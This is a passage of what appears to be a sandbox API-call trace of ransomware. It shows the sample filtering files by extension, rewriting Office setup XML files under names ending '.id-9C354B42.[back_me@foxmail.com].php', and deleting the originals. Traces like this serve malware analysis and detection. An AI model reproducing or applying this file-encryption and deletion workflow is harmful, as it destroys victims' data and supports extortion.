lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString=".7z") returned 3 [0041.759] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.759] lstrlenW (lpString=".dbf") returned 4 [0041.759] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.759] lstrlenW (lpString=".1cd") returned 4 [0041.759] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.759] lstrlenW (lpString=".jpg") returned 4 [0041.759] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.759] lstrlenW (lpString=".doc") returned 4 [0041.759] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString=".docx") returned 5 [0041.759] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.759] lstrlenW (lpString=".pdf") returned 4 [0041.759] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString=".xls") returned 4 [0041.759] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString=".xlsx") returned 5 [0041.760] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.760] lstrlenW (lpString=".ppt") returned 4 [0041.760] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.760] lstrlenW (lpString=".zip") returned 4 [0041.760] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.760] lstrlenW (lpString=".rar") returned 4 [0041.760] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.760] lstrlenW (lpString=".bz2") returned 4 [0041.760] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.760] lstrlenW (lpString=".7z") returned 3 [0041.760] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.760] lstrlenW (lpString=".dbf") returned 4 [0041.760] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.760] lstrlenW (lpString=".1cd") returned 4 [0041.760] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.760] lstrlenW (lpString=".jpg") returned 4 [0041.760] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.760] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.760] lstrlenW (lpString="PrjProrWW.XML") returned 13 [0041.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.762] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=6421) returned 1 [0041.762] CloseHandle (hObject=0x1b0) returned 1 [0041.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 0x20 [0041.762] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.762] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.762] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0041.762] GetLastError () returned 0x0 [0041.763] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x1915, lpOverlapped=0x0) returned 1 [0041.764] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x1920, lpOverlapped=0x0) returned 1 [0041.766] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.766] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xee, lpOverlapped=0x0) returned 1 [0041.766] SetEndOfFile (hFile=0x1a8) returned 1 [0041.766] CloseHandle (hObject=0x1a8) returned 1 [0041.766] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.767] SetEndOfFile (hFile=0x1b0) returned 1 [0041.767] CloseHandle (hObject=0x1b0) returned 1 [0041.768] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.768] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 1 [0041.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.768] lstrlenW (lpString=".doc") returned 4 [0041.768] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.768] lstrlenW (lpString=".docx") returned 5 [0041.768] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.768] lstrlenW (lpString=".pdf") returned 4 [0041.768] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.768] lstrlenW (lpString=".xls") returned 4 [0041.768] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.768] lstrlenW (lpString=".xlsx") returned 5 [0041.768] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.768] lstrlenW (lpString=".ppt") returned 4 [0041.768] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.769] lstrlenW (lpString=".zip") returned 4 [0041.769] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.769] lstrlenW (lpString=".rar") returned 4 [0041.769] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.769] lstrlenW (lpString=".bz2") returned 4 [0041.769] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.769] lstrlenW (lpString=".7z") returned 3 [0041.769] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.769] lstrlenW (lpString=".dbf") returned 4 [0041.769] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.769] lstrlenW (lpString=".1cd") returned 4 [0041.769] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.769] lstrlenW (lpString=".jpg") returned 4 [0041.769] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.769] lstrlenW (lpString=".doc") returned 4 [0041.769] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.769] lstrlenW (lpString=".docx") returned 5 [0041.769] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.769] lstrlenW (lpString=".pdf") returned 4 [0041.769] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.769] lstrlenW (lpString=".xls") returned 4 [0041.769] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.770] lstrlenW (lpString=".xlsx") returned 5 [0041.770] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.770] lstrlenW (lpString=".ppt") returned 4 [0041.770] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.770] lstrlenW (lpString=".zip") returned 4 [0041.770] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.770] lstrlenW (lpString=".rar") returned 4 [0041.770] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.770] lstrlenW (lpString=".bz2") returned 4 [0041.770] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.770] lstrlenW (lpString=".7z") returned 3 [0041.770] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.770] lstrlenW (lpString=".dbf") returned 4 [0041.770] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.770] lstrlenW (lpString=".1cd") returned 4 [0041.770] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML") returned 101 [0041.770] lstrlenW (lpString=".jpg") returned 4 [0041.770] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.770] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.770] lstrlenW (lpString="SETUP.XML") returned 9 [0041.770] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.771] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=16683) returned 1 [0041.771] CloseHandle (hObject=0x1b0) returned 1 [0041.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 0x20 [0041.772] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.772] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.772] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.772] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.772] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0041.774] GetLastError () returned 0x0 [0041.774] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x412b, lpOverlapped=0x0) returned 1 [0041.776] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0041.777] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.777] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.777] SetEndOfFile (hFile=0x1a8) returned 1 [0041.777] CloseHandle (hObject=0x1a8) returned 1 [0041.778] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.778] SetEndOfFile (hFile=0x1b0) returned 1 [0041.779] CloseHandle (hObject=0x1b0) returned 1 [0041.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.779] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\setup.xml")) returned 1 [0041.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.780] lstrlenW (lpString=".doc") returned 4 [0041.780] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.780] lstrlenW (lpString=".docx") returned 5 [0041.780] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.780] lstrlenW (lpString=".pdf") returned 4 [0041.780] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.780] lstrlenW (lpString=".xls") returned 4 [0041.780] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.780] lstrlenW (lpString=".xlsx") returned 5 [0041.780] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.780] lstrlenW (lpString=".ppt") returned 4 [0041.780] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.780] lstrlenW (lpString=".zip") returned 4 [0041.780] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.780] lstrlenW (lpString=".rar") returned 4 [0041.780] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.780] lstrlenW (lpString=".bz2") returned 4 [0041.780] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.780] lstrlenW (lpString=".7z") returned 3 [0041.780] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.781] lstrlenW (lpString=".dbf") returned 4 [0041.781] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.781] lstrlenW (lpString=".1cd") returned 4 [0041.781] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.781] lstrlenW (lpString=".jpg") returned 4 [0041.781] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.781] lstrlenW (lpString=".doc") returned 4 [0041.781] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.781] lstrlenW (lpString=".docx") returned 5 [0041.781] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.781] lstrlenW (lpString=".pdf") returned 4 [0041.781] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.781] lstrlenW (lpString=".xls") returned 4 [0041.781] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.781] lstrlenW (lpString=".xlsx") returned 5 [0041.781] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.781] lstrlenW (lpString=".ppt") returned 4 [0041.781] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.781] lstrlenW (lpString=".zip") returned 4 [0041.781] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.781] lstrlenW (lpString=".rar") returned 4 [0041.781] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.781] lstrlenW (lpString=".bz2") returned 4 [0041.782] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.782] lstrlenW (lpString=".7z") returned 3 [0041.782] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.782] lstrlenW (lpString=".dbf") returned 4 [0041.782] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.782] lstrlenW (lpString=".1cd") returned 4 [0041.782] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.782] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\SETUP.XML") returned 97 [0041.782] lstrlenW (lpString=".jpg") returned 4 [0041.782] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.782] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.782] lstrlenW (lpString="ProjectMUI.XML") returned 14 [0041.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.783] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1452) returned 1 [0041.783] CloseHandle (hObject=0x1b0) returned 1 [0041.783] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 0x20 [0041.783] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.783] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.783] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0041.785] GetLastError () returned 0x0 [0041.785] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0041.787] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0041.788] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.788] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0041.788] SetEndOfFile (hFile=0x1a8) returned 1 [0041.788] CloseHandle (hObject=0x1a8) returned 1 [0041.789] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.789] SetEndOfFile (hFile=0x1b0) returned 1 [0041.790] CloseHandle (hObject=0x1b0) returned 1 [0041.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.790] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\project.en-us\\projectmui.xml")) returned 1 [0041.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\ProjectMUI.XML") returned 108 [0041.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 